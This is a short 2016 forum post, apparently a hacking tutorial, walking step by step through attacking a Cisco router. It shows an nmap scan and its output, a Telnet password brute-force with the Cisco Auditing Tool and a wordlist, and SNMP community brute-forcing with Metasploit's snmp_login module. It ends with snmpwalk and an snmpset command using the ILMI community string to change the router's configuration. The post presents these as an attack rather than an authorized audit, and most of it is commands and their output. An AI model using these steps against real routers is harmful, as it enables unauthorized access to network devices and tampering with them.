Post Fri Aug 12, 2016 1:38 am

Simple Attack Router Cisco

Hello Anybody,

I want to share about How to simple attack Router, maybe in case Router Cisco

First we must scanning with nmap : we can combine attack TCP and UDP..

We hope router open remote access (tcp) and snmp in port (udp)

Use Backtrack or Kali Linux :
nmap -sS -sU -T5 192.168.2.1

29954U@root:/pentest/cisco$ nmap -sS -sU -T5 192.168.2.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-05-12 09:04 EDT
Warning: 192.168.2.1 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.2.1
Host is up (0.0022s latency).
Not shown: 1248 closed ports, 749 open|filtered ports
PORT STATE SERVICE
23/tcp open telnet
79/tcp open finger
161/udp open snmp
MAC Address: 00:02:FD:60:77:20 (Cisco Systems)


and then you can see port 23/tcp and 161/udp is open, so we can attack now

Telnet : We can bruteforce using hydra or cisco tools

29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h 192.168.2.1 -w /pentest/passwords/john/password.lst

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.2.1


Guessing passwords:

Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Invalid Password: router


now you can attack snmp to bruteforce with msfconsole :

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.2.1
rhosts => 192.168.2.1
msf auxiliary(snmp_login) > set THREADS 3
threads => 3
msf auxiliary(snmp_login) > exploit

if success you can see community to read and write...

You can command

snmpwalk -mALL -v1 -c public 192.168.2.1

or if you must exploit you can change with

snmpset -c ILMI -v 2c 192.168.2.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1

All techniq about change you can see in wiki snmpset

Detail Lab : hackingdojo.com